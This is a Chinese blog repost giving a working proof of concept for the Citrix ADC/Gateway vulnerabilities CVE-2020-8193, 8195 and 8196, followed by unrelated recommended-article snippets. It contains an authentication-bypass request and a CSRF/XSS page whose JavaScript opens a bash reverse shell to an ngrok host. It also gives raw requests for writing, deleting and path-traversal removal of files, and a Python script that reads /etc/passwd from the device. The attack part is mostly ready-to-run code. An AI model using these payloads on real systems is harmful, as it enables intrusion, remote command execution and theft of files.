【转载】Citrix Systems产品安全漏洞最新POC---CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196 poc_cve-2020-8195复现-程序员宅基地
技术标签: 漏洞复现 安全漏洞 POC Cisco 从入门到精通 网络安全 计算机类
转载自:https://www.cnblogs.com/potatsoSec/p/13281577.html
稍有修改。侵删。
Citrix 简介
Citrix Systems Citrix Application Delivery Controller(ADC)等都是美国思杰系统(Citrix Systems)公司的产品。Citrix Application Delivery Controller是一款应用交付控制器。Citrix Systems Gateway(Citrix Systems NetScaler Gateway)是一套安全的远程接入解决方案。Citrix System SDWAN WAN-OP是一款SD-WAN(虚拟软件定义的广域网)设备。 Citrix Systems Citrix ADC、Citrix Gateway和Citrix SDWAN WAN-OP中存在安全漏洞。攻击者可利用该漏洞绕过权限限制。
受影响版本
- Citrix ADC和Citrix Gateway < 13.0-58.30
- Citrix ADC和NetScaler Gateway < 12.1-57.18
- Citrix ADC和NetScaler Gateway < 12.0-63.21
- Citrix ADC和NetScaler Gateway < 11.1-64.14
- NetScaler ADC和NetScaler Gateway < 10.5-70.18
- Citrix SD-WAN WANOP < 11.1.1a
- Citrix SD-WAN WANOP < 11.0.3d
- Citrix SD-WAN WANOP < 10.2.7
- Citrix Gateway Plug-in for Linux < 1.0.0.137
PoC
权限绕过payload
发送如下payload即可获取设备最高权限
GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
Host: citrix.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: SESSID=05afba59ef8e0e35933f3bc266941337
Upgrade-Insecure-Requests: 1
读取文件
xss to shell
payload 如下
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://citrix.local/menu/stapp" method="POST">
<input type="hidden" name="sid" value="254" />
<input type="hidden" name="pe" value="1,2,3,4,5" />
<input type="hidden" name="appname" value="%0a</title><script src='http://localhost:9090/code_exec.js'></script>" />
<input type="hidden" name="au" value="1" />
<input type="hidden" name="username" value="nsroot" />
<input type="submit" value="Submit request" />
</form>
</body></html>
function load(url, callback) {
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState === 4) {
rand = callback(xhr.response);
exec_command(rand);
}
}
xhr.open('GET', url, true);
xhr.send('');}
function get_rand(payload) {
var lines = payload.split("\n");
for(var i = 0; i < lines.length; i++) {
if (lines[i].includes('var rand = "')) {
var rand = lines[i].split('"')[1]
return rand;
}
}}
function exec_command(rand) {
url = '/rapi/remote_shell'
command = 'bash -c \"bash -i >%26 /dev/tcp/0.tcp.ngrok.io/16588 0>%261\"'
var obj = {
"params":{
"warning":"YES"
},
"remote_shell":{
"command":command,
"prompt":">",
"target":"shell",
"suppress":0,
"execute_in_partition":""
}
}
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState === 4) {
response = JSON.parse(xhr.response);
alert(response['remote_shell']['output']);
}
}
xhr.open('POST', url, true);
xhr.setRequestHeader('rand_key', rand)
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded')
xhr.send('object=' + JSON.stringify(obj));
}
var url = '/menu/stc';load(url, get_rand)
写入文件
POST /rapi/uploadtext HTTP/1.1Host: citrix.localUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://citrix.local/menu/neoDNT: 1rand_key: 331543635.1580073639558554Connection: closeCookie: startupapp=neo; is_cisco_platform=0; st_splitter=350px; SESSID=05afba59ef8e0e35933f3bc266941337; rdx_pagination_size=25%20Per%20PageUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 99
object={
"uploadtext":{
"filedir":"/tmp","filedata":"test","filename":"test.txt"}}
删除文件
POST /rapi/filedownload?filter=remove:1,path:%2ftmp%2ftest HTTP/1.1
Host: citrix.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://citrix.local/menu/neo
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
rand_key: 2061490565.1580290269373855
DNT: 1
X-NITRO-USER: henk
X-NITRO-PASS: henk
Connection: close
Cookie: startupapp=neo; is_cisco_platform=0; st_splitter=350px; rdx_pagination_size=25%20Per%20Page; SESSID=05afba59ef8e0e35933f3bc266941337
Content-Type: application/xml
Content-Length: 31
<clipermission></clipermission>
删除文件夹
POST /rapi/movelicensefiles HTTP/1.1
Host: citrix.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://citrix.local/menu/neo
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
DNT: 1
Content-Type: application/x-www-form-urlencoded
Cookie: SESSID=9ed492e6ff1876d44ddcaec143d2f949
rand_key: 1384537322.1580549312074652
Content-Length: 52
object={
"movelicensefiles":{
"name":"../netscaler/portal/modules/STAT"}}
创建文件夹
POST /rapi/uploadtext HTTP/1.1
Host: citrix.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://citrix.local/menu/neo
DNT: 1
rand_key: 1467045781.1580550597345443
X-NITRO-USER: henk
X-NITRO-PASS: henk
Connection: close
Cookie: startupapp=neo; is_cisco_platform=0; st_splitter=350px; SESSID=05afba59ef8e0e35933f3bc266941337; rdx_pagination_size=25%20Per%20Page
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
object={
"uploadtext":{
"filedir":false,"filedata":"data","filename":"/var/tmp/new_directory/this_will_be_removed"}}
利用工具
#!/usr/bin/env python
import requestsimport sysimport stringimport randomimport jsonfrom urllib.parse import quote
# Slashes need to be urlencoded
PAYLOAD='%2fetc%2fpasswd'
requests.packages.urllib3.disable_warnings()
def random_string(length=8):
chars = string.ascii_letters + string.digits
random_string = ''.join(random.choice(chars) for x in range(length))
return random_string
def create_session(base_url, session):
url = '{0}/pcidss/report'.format(base_url)
params = {
'type':'allprofiles',
'sid':'loginchallengeresponse1requestbody',
'username':'nsroot',
'set':'1'
}
headers = {
'Content-Type':'application/xml',
'X-NITRO-USER':random_string(),
'X-NITRO-PASS':random_string(),
}
data = '<appfwprofile><login></login></appfwprofile>'
session.post(url=url, params=params, headers=headers, data=data, verify=False)
return session
def fix_session(base_url, session):
url = '{0}/menu/ss'.format(base_url)
params = {
'sid':'nsroot',
'username':'nsroot',
'force_setup':'1'
}
session.get(url=url, params=params, verify=False)
def get_rand(base_url, session):
url = '{0}/menu/stc'.format(base_url)
r = session.get(url=url, verify=False)
for line in r.text.split('\n'):
if 'var rand =' in line:
rand = line.split('"')[1]
return rand
def do_lfi(base_url, session, rand):
url = '{0}/rapi/filedownload?filter=path:{1}'.format(base_url, PAYLOAD)
headers = {
'Content-Type':'application/xml',
'X-NITRO-USER':random_string(),
'X-NITRO-PASS':random_string(),
'rand_key':rand
}
data = '<clipermission></clipermission>'
r = session.post(url=url, headers=headers, data=data, verify=False)
print (r.text)
def main(base_url):
print ('[-] Creating session..')
session = requests.Session()
create_session(base_url, session)
print ('[+] Got session: {0}'.format(session.cookies.get_dict()['SESSID']))
print('[-] Fixing session..')
fix_session(base_url, session)
print ('[-] Getting rand..')
rand = get_rand(base_url, session)
print ('[+] Got rand: {0}'.format(rand))
print ('[-] Re-breaking session..')
create_session(base_url, session)
print ('[-] Getting file..')
do_lfi(base_url, session, rand)
if __name__ == '__main__':
base_url = sys.argv[1]
main(base_url)
参考
- https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence
- https://dmaasland.github.io/posts/citrix.html
智能推荐
EDB的安装和如何带参数运行程序_edb安装-程序员宅基地
文章浏览阅读1k次。首先是EDB 的安装安装install dependenciessudo apt-get install cmake build-essential libboost-dev libqt5xmlpatterns5-dev qtbase5-dev qt5-default libqt5..._edb安装
Ubuntu中将Pycharm/Clion/IDEA添加快捷方式到任务栏_ubuntu idea 任务栏-程序员宅基地
文章浏览阅读1.4k次,点赞2次,收藏4次。Ubuntu中将Pycharm/Clion/IDEA添加快捷方式到任务栏网上很多用命令的方式添加,但软件本身已经提供了方式,没必要在自己弄一遍文件啥的_ubuntu idea 任务栏
SpringData MongoDB_spring data mongodb-程序员宅基地
文章浏览阅读3.5k次。目录1 SpringData MongoDB简介2 MongoDB环境搭建2.1 解压2.2 创建需要的目录2.3 创建配置文件2.4 启动mongodb3 SpringData MongoDB入门案例3.1目标3.2 创建工程,引入坐标3.3 创建配置文件3.4 创建实体类3.5 自定义dao接口3.6 测试4 SpringData MongoDB实现CRUD操作4.1 增删改4.2 简单查询4.3 命名规则查询1 SpringData MongoDB简介MongoDB是一个跨平台的,面向文档的数据_spring data mongodb
【MySQL】MySQL免密登录的几种方式_mysql 免密登录-程序员宅基地
文章浏览阅读1.6k次,点赞9次,收藏9次。参考资料:MySQL实现(免密登录)参考资料:mysql服务器免密登录配置参考资料:Mysql之三种免密登录方式_mysql 免密登录
王珊的第五版数据库系统概论--第七章总结概述_数据库系统概论第五版与第七版有何不同-程序员宅基地
文章浏览阅读718次。第七章 数据库设计数据库设计分6个阶段1.需求分析:通过前期调查和分析是否做得充分与准确,决定了构建数据库的速度和质量。2.概念结构设计:通过对用户需求进行综合、归纳与抽象,用E-R图形成一个独立于具体数据库管理系统的概念模型。3.逻辑结构设计:将概念结构转换为某个数据库管理系统所支持的数据模型,并对其进行优化。逻辑模式、外模式4.物理结构设计:为逻辑数据结构选取一个最适合应用环境的物理结构。包括存储结构和存取方法。内模式5.数据库实施:根据逻辑设计和物理设计的结果构建数据库,编写与调试应用程_数据库系统概论第五版与第七版有何不同
vue中$event的用法——如何获取当前兄弟元素,子元素,父元素_vue event.target 获取同级下一个元素-程序员宅基地
文章浏览阅读2.4w次,点赞10次,收藏46次。<template> <div> <button @click="getEvent($event)">点击</button> </div></template><script> export default { data(){ return{ ..._vue event.target 获取同级下一个元素
随便推点
(6.1)各种USB接口简介_常用usb接口-程序员宅基地
文章浏览阅读3.6w次,点赞7次,收藏76次。/* AUTHOR: Pinus* Creat on : 2018-11-3* REFS : Type-C与Type-A、Type-B接口 Linux USB驱动学习总结(一)---- USB基本概念及驱动架构*/USB概念介绍USB,Universal Serial Bus(通用串行总线),是一个外部总线标准,用于规范电脑与外部设备的连接和通..._常用usb接口
通过Kivy将Python文件打包成apk_python程序通过kivy打包为apk且可以调用摄像头-程序员宅基地
文章浏览阅读9.3w次,点赞39次,收藏457次。一.前言Kivy 是一个开源的 Python 框架,用于快速开发应用,实现各种当前流行的用户界面,比如多点触摸等等。且Kivy 可以运行于 Windows, Linux,MacOS, Android, iOS 等当前绝大部分主流桌面/移动端操作系统。周日在配置Kivy时,教程繁多繁琐,让自己有些找不着北,挨个试后,经常在某处卡壳,屡屡碰壁,希望自己接下来的_python程序通过kivy打包为apk且可以调用摄像头
keil中invalid combination of type specifiers和duplicate specifier in declaration错误-程序员宅基地
文章浏览阅读8.9k次。由于之前的unsigned char型数据被宏定义为uchar,即#define uchar unsigned char,但是在标准的stm32工程中unsigned char是被定义为uint8_t,所以我就把所有之前定义的uchar通过keil的替换功能全部替换为uint8_t,但是之后编译居然出现20个错误!!!!我做了什么???并且所有的错误都指向typedef unsigned ..._invalid combination of type
Jeston TX2-配置中文输入法_tx2 genghuanyuyan-程序员宅基地
文章浏览阅读2.6k次。本文转载自博主“Richar-张”的文章,出处为:https://blog.csdn.net/zj573453769/article/details/53446426仅用于本人记录TX2的学习历程,若有侵权,请告知我,会立即删除1.Fcits安装:[python] view plain copysudo apt install fcitx fcitx-googlepinyin fcitx-tabl..._tx2 genghuanyuyan
安装配置Visual Studio Code Kubernetes Tools_vscode visual studio k5-程序员宅基地
文章浏览阅读1w次,点赞3次,收藏11次。Visual Studio Code Kubernetes Tools1. vscode配置连通k8s1.1拿到k8s集群的配置文件信息1.2 vscode安装插件[Visual Studio Code Kubernetes Tools](https://marketplace.visualstudio.com/items?itemName=ms-kubernetes-tools.vscode-k..._vscode visual studio k5
pip安装命令_pipanzhuangming;-程序员宅基地
文章浏览阅读6.7k次,点赞2次,收藏8次。打开网址下载pip:https://pypi.org/project/pip/#files解压到你的anaconda包路径中,我的是下图:现在开始安装进入cmd之后,进入d盘:d:进入d盘之后cdD:\anaconda\Lib\site-packages\pip-19.0.3进入目录之后python setup.py install然后..._pipanzhuangming;